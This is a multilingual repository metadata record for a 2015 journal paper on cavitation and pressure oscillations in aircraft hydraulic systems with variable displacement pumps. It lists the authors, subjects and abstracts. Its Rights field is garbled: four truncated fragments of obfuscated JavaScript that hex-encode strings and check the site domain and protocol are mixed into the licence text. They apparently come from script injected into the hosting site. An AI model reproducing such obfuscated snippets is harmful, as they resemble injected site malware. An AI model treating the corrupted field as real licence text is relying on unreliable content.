Record Details

PRESSURE OSCILLATIONS IN TRANSIENT PROCESSES OF HYDRAULIC SYSTEMS WITH VARIABLE DISPLACEMENT PUMPS

Наукові журнали Національного Авіаційного Університету

View Archive Info
 
 
Field Value
 
Title PRESSURE OSCILLATIONS IN TRANSIENT PROCESSES OF HYDRAULIC SYSTEMS WITH VARIABLE DISPLACEMENT PUMPS
Колебания давления в переходных процесах гидравлических систем с насосами переменной подачи
Коливання тиску в перехідних процесах гідрав- лічних систем з насосами змінної подачі
 
Creator Zaionchkovskyi, Hennadii; National Aviation University, Kyiv, Ukraine
Butko, Volodymur; National Aviation University, Kyiv, Ukraine
Tarasenko, Taras; National Aviation University, Kyiv, Ukraine
 
Subject
aircraft; cavitation; hydraulic system; pressure oscillations; pressure pipeline; pump delivery; variable displacement pump; working fluid
629.735.063

гидравлическая система; кавитация; колебания давления; напорная магистраль; насос регу- лируемой подачи; подача насоса; рабочая жидкость; самолет
629.735.063

гідравлічна система; кавітація; коливання тиску; літак; напірна магістраль; насос регульованої подачі; подача насоса; робоча рідина
629.735.063
 
Description In aviation hydraulic drive of high power as a power supply the axial-piston variable displacement pumps became wide spreaded. The pump operational modes with air isolation and cavitation are accompanied by increased noise, delivery reduction and intensive pressure oscillations. The negative results of such phenomena are hydraulic elements erosion, pipeline fatigue failure, working fluid viscosity reduction and its contamination by wear products. The mechanism of cavitation rising in axial-piston pumps is considered, and factors which influence the cavitation rising and working fluid aeration are specified. The features of transient processes in aircraft hydraulic systems with variable displacement pumps are considered. It has been showed that as the pump delivery changes from its minimum to maximum great pressure oscillations in the aircraft pressure pipeline of the hydraulic system takes place, and have a negative influence on the pump service life. The recommendations concerning such pressure oscillation reduction are given.
В авиационном гидроприводе большой мощности в качестве источников питания получили распространение аксиально-поршневые насосы регулируемой подачи. Режимы работы насоса, при которых происходит выделение воздуха и кавитация, сопровождаются повышенным шумом, снижением подачи, интенсивными колебаниями давления. Отрицательные последствия этих явлений – эрозия деталей, усталостное разрушение трубопроводов, снижение вязкости рабочей жидкости, ее загрязнение продуктами износа. В статье рассмотрен механизм возникновения кавитации в аксиально-поршневых насосах, определены факторы, влияющие на возникновение кавитации и аэрации рабочей жидкости в аксиально-поршневых насосах. Также рассмотрены особенности переходных процессов в гидросистеме самолета. Показано, что при изменении подачи насоса с минимальной до максимальной возможны значительные колебания давления в напорной магистрали гидросистемы самолета, которые отрицательно влияют на ресурс насоса. Даются рекомендации по уменьшению таких колебаний давления.
У авіаційному гідроприводі великої потужності в якості джерел живлення отримали розповсюдження аксіально-поршневі насоси регульованої подачі. Режими роботи насоса, за яких відбувається виділення повітря і кавітація, супроводжуються підвищеним шумом, зниженням подачі, інтенсивними коливаннями тиску. Негативні наслідки цих явищ – ерозія деталей, втомне руйнування трубопроводів, зниження в'язкості робочої рідини, її забруднення продуктами зносу. У статті розглянуто механізм виникнення кавітації в аксіально-поршневих насосах, визначені фактори, що впливають на виникнення кавітації та аерації робочої рідини в цих насосах. Також розглянуто особливості перехідних процесів в гідросистемі літака. Показано, що при зміні подачі насоса з мінімальної до максимальної можливі значні коливання тиску в напірній магістралі гідросистеми літака, які негативно впливають на ресурс насоса. Даються рекомендації щодо зменшення таких коливань тиску.
 
Publisher National Aviation University
 
Contributor


 
Date 2015-12-10
 
Type


 
Format application/pdf
application/pdf
application/pdf
 
Identifier http://jrnl.nau.edu.ua/index.php/visnik/article/view/9854
10.18372/2306-1472.65.9854
 
Source Proceedings of the National Aviation University; Том 65, № 4 (2015); 49-54
Вестник Национального авиационного университета; Том 65, № 4 (2015); 49-54
Вісник Національного Авіаційного Університету; Том 65, № 4 (2015); 49-54
 
Language en
 
Rights // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Автори, які публікуються у цьому журналі, погоджуються з такими умовами:Автори залишають за собою право на авторство своєї роботи та передають журналу право першої публікації цієї роботи на умовах ліцензії Creative Commons Attribution License, котра дозволяє іншим особам вільно розповсюджувати опубліковану роботу з обов'язковим посиланням на авторів оригінальної роботи та першу публікацію роботи у цьому журналі.Автори мають право укладати самостійні додаткові угоди щодо неексклюзивного розповсюдження роботи у тому вигляді, в якому вона була опублікована цим журналом (наприклад, розміщувати роботу в електронному сховищі установи або публікувати у складі монографії), за умови збереження посилання на першу публікацію роботи у цьому журналі.Політика журналу дозволяє і заохочує розміщення авторами в мережі Інтернет (наприклад, у сховищах установ або на особистих веб-сайтах) рукопису роботи, як до подання цього рукопису до редакції, так і під час його редакційного опрацювання, оскільки це сприяє виникненню продуктивної наукової дискусії та позитивно позначається на оперативності та динаміці цитування опублікованої роботи (див. The Effect of Open Access).// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
 

Технічна підтримка: НДІІТТ НАУ